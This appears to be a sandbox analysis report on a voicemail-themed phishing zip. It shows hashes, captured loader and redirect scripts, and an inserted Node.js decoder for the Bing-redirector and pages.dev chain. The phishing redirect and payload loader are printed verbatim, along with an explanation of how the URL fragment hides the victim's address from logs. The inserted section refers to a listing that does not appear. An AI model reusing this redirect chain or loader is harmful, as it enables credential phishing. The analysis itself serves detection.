                    SHA-256:E24EB8D0A4EF95CAF9256EE5436418942813E3DDB962ED19ACFF176A88100DA8
                    SHA-512:03D4F9661D73333E3BBB9482DCEEE464059DF545726B83D96C0C50D92D4AC18FC6D48E48D5AC9458AA8F9D55351D21765D0829CF4A79AB56B3FAC0947492B18A
                    Malicious:false
                    Reputation:unknown
                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8afeaf703f4f4265/1723111499898/E_bN1ZYpaYJfOz0
                    Preview:.PNG........IHDR......."......m......IDAT.....$.....IEND.B`.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (18581), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):19122
                    Entropy (8bit):5.705542158565832
                    Encrypted:false
                    SSDEEP:
                    MD5:B8275E53D1EA59765575D558DF8526C0
                    SHA1:470F5168A463EF1B284ADC7941F8A9969459A143
                    SHA-256:95F4AE68628964A5D9324DBCFCCA3E83BBF8040D27E5855A6EB570497F957236
                    SHA-512:6459FD3CDDBE45E562A8BA6EA7CBB094285640D09DD13D29F29C52698A561F683D36E9830DE69A46773545EE256A5B8D512889B2A871F19A0ACA458487CCDCA3
                    Malicious:false
                    Reputation:unknown
                    URL:https://kisswire.com/fthjx.php?4-797967704b536932307466507a7370495430744a5338346f5338724b7938724f4166494b79347641794e5459784e5459314d6a59794e685572794178506256594c79573154423841-calypso
                    Preview:var establish= document.createElement("script");..establish.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(establish);..establish.onload=function(){..var {a,b,c,d} = JSON.parse(atob("[base64 payload elided]
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (44174)
                    Category:downloaded
                    Size (bytes):44175
                    Entropy (8bit):5.377219977973567
                    Encrypted:false
                    SSDEEP:
                    MD5:66E93C1F0C53BB0A4A34C2BE54427E6C
                    SHA1:24346C2941C3D92C9F3634FC594079F4706650F7
                    SHA-256:CE9B46C18D0769C78A7E889EB237606CB96B602061B39B4C1159A22A015B51DF
                    SHA-512:30E800EAA414A0F571E5100B71B19AC23743814A8FD2B7C991DA97FEA844B18F4EF64FC4AA90C3C300CC94F6FF47EA201E410F19F80CEE84D2E307AAA10EF1DE
                    Malicious:false
                    Reputation:unknown
                    URL:https://challenges.cloudflare.com/turnstile/v0/g/769ce3c24a3b/api.js
                    Preview:"use strict";(function(){function Rt(e,n,r,o,c,u,y){try{var _=e[u](y),d=_.value}catch(p){r(p);return}_.done?n(d):Promise.resolve(d).then(o,c)}function It(e){return function(){var n=this,r=arguments;return new Promise(function(o,c){var u=e.apply(n,r);function y(d){Rt(u,o,c,y,_,"next",d)}function _(d){Rt(u,o,c,y,_,"throw",d)}y(void 0)})}}function F(e,n){return n!=null&&typeof Symbol!="undefined"&&n[Symbol.hasInstance]?!!n[Symbol.hasInstance](e):F(e,n)}function Ie(e,n,r){return n in e?Object.defineProperty(e,n,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[n]=r,e}function Oe(e){for(var n=1;n<arguments.length;n++){var r=arguments[n]!=null?arguments[n]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Ie(e,c,r[c])})}return e}function gr(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (47992), with no line terminators
                    Category:downloaded
                    Size (bytes):47992
                    Entropy (8bit):5.605846858683577
                    Encrypted:false
                    SSDEEP:
                    MD5:CF3402D7483B127DED4069D651EA4A22
                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                    Malicious:false
                    Reputation:unknown
                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):206
                    Entropy (8bit):5.573141902577794
                    Encrypted:false
                    SSDEEP:
                    MD5:EBE3A619969A0A3F1702E229568DEE85
                    SHA1:0111D18EFB5F9D084C3BF5653FD13181061F562D
                    SHA-256:F9DD76372877E955AC5595686962F7D958CF0E55C7DA6F0AA84394EBE0141710
                    SHA-512:66D2A0759396FFDBF3261181CDEE2552B23712E81E2774A7B9D9883F6090D723A0F41D2D548D4464F5D08923F53287E1A53C6B99D6A83D797C53DD452071F572
                    Malicious:false
                    Reputation:unknown
                    URL:https://kisswire.com/fthjx.php
                    Preview:<script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9ramhnZmRmY2h2YmpuamtsaGdmcXdycXdycXc1MzQ1MzUyMzIzNS5wYWdlcy5kZXYvI0hhMkZ5Wlc0dVluVnlZMmhBZG05emMyeHZhQzVqYjIwPQ==";</script>
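The 206-byte response from https://kisswire.com/fthjx.php above is a bare client-side redirect: it sends the top frame through Bing's click redirector, whose `u=` parameter carries the real destination as base64 behind a two-character `a1` marker, and that destination is the pages.dev page listed earlier in this report, with a further base64 layer in the URL fragment behind a one-letter marker. The Node.js script below is an added example, not part of the Joe Sandbox report or of the kit, that decodes that chain offline from the captured script text so the redirector and landing page never have to be contacted. Treating the leading characters as strippable markers is an inference from the strings in this report, not documented behaviour of either Bing or the kit; the decoded fragment is shaped like an e-mail address, so the script reports only its shape rather than the value.

```javascript
// Added example (not from the report or the kit): walk the redirect chain
// kisswire.com -> r.g.bing.com/bam/ac -> *.pages.dev offline, from the
// captured script body. Node.js >= 16, no third-party modules.

// The 206-byte response shown in the report, copied verbatim.
const REDIRECT_SCRIPT =
  '<script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9ramhnZmRmY2h2YmpuamtsaGdmcXdycXdycXc1MzQ1MzUyMzIzNS5wYWdlcy5kZXYvI0hhMkZ5Wlc0dVluVnlZMmhBZG05emMyeHZhQzVqYjIwPQ==";</script>';

const B64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

// Pull the literal assigned to window.top.location.href out of the markup.
function extractRedirectTarget(html) {
  const m = html.match(/window\.top\.location\.href\s*=\s*"([^"]+)"/);
  return m ? m[1] : null;
}

// Redirectors and kits often prepend a short marker to a base64 payload
// ("a1" on the Bing click URL, one letter on the kit's fragment). Try
// stripping 0..3 leading characters and return the first candidate that is
// well-formed base64 and decodes to printable ASCII. Assumption: markers are
// at most three characters long.
function peelBase64(s) {
  for (let k = 0; k <= 3; k++) {
    const cand = s.slice(k);
    if (cand.length % 4 !== 0 || !B64_RE.test(cand)) continue;
    const text = Buffer.from(cand, "base64").toString("latin1");
    if (/^[\x20-\x7e]+$/.test(text)) return { marker: s.slice(0, k), text };
  }
  return null;
}

// Decode both hops and summarise what the analyst needs: which redirector
// was abused, where the victim actually lands, and whether the fragment
// personalises the link for one recipient.
function decodeRedirectChain(html) {
  const hop1 = extractRedirectTarget(html);
  if (!hop1) throw new Error("no location.href assignment found");
  const redirector = new URL(hop1);
  const param = redirector.searchParams.get("u");
  if (!param) throw new Error("redirector has no u= parameter");
  const landing = peelBase64(param);
  if (!landing) throw new Error("u= parameter is not marker+base64");
  const landingUrl = new URL(landing.text);
  const fragment = landingUrl.hash.slice(1);
  const fragPayload = fragment ? peelBase64(fragment) : null;
  return {
    redirector: redirector.hostname,
    marker: landing.marker,
    landing: landingUrl.origin + landingUrl.pathname,
    fragmentMarker: fragPayload ? fragPayload.marker : null,
    // The kit reads the fragment client-side, so it never reaches server
    // logs; an e-mail-shaped value means the lure was built per recipient.
    fragmentLooksLikeEmail:
      fragPayload !== null && /^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(fragPayload.text),
  };
}

console.log(JSON.stringify(decodeRedirectChain(REDIRECT_SCRIPT), null, 2));
```

The fragment trick matters for detection: proxies and the redirector only ever see the pages.dev URL without the `#...` part, so the recipient identity travels to the phishing page without appearing in any server-side log along the way.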
                    File type:Zip archive data, at least v4.5 to extract, compression method=deflate
                    Entropy (8bit):7.987375667584123
                    TrID:
                    • ZIP compressed archive (8000/1) 100.00%
                    File name:You_missed_a_VM _Transcription_Available_Play_Now.zip
                    File size:20'685 bytes
                    MD5:221f7e9438c2f8c1ba887734276da8b8
                    SHA1:3068c66307ea34c3368385b346c18b1d3853f649
                    SHA256:e8afbd2ef4b53ba9de32e9ba6193ebd4adbb160145d5c58c6ff5a0d7bbc19b67
                    SHA512:3b26356c3dea72c04e5c10763d9eb3b9c85da6ed4859cf41af3fe0d446ee21d38daa1c9f26bea1f917127352f99d94a0e8c218d7f836438c818f0cb4d02eb256
                    SSDEEP:384:Au1HTfhcy4vwSWUUpRDt1tEZRCtMFVya5Kh6jjeGo1kx3:AOHTfhcybhpVt1tMCtXnc5oi3
                    TLSH:5192C001FCBEC27BF84D33B5859E3869092D7C3886D609153329F8A856EB15C986F537
                    File Content Preview:PK..-......N.Y...P........M...dedc83fb-bb86-46ba-eb0a-08dcb6f9d89e/0487740a-25b6-b501-5a7a-7d2325a24229.eml.............O............fL..?.v...2.........m!........U5'KS....$W8t)../....X..Y>.t..O'...I..B.!0......^..'.'...-Wy.5<....&./..}WGZ..E.6p...[d..{..
                    Icon Hash:1c1c1e4e4ececedc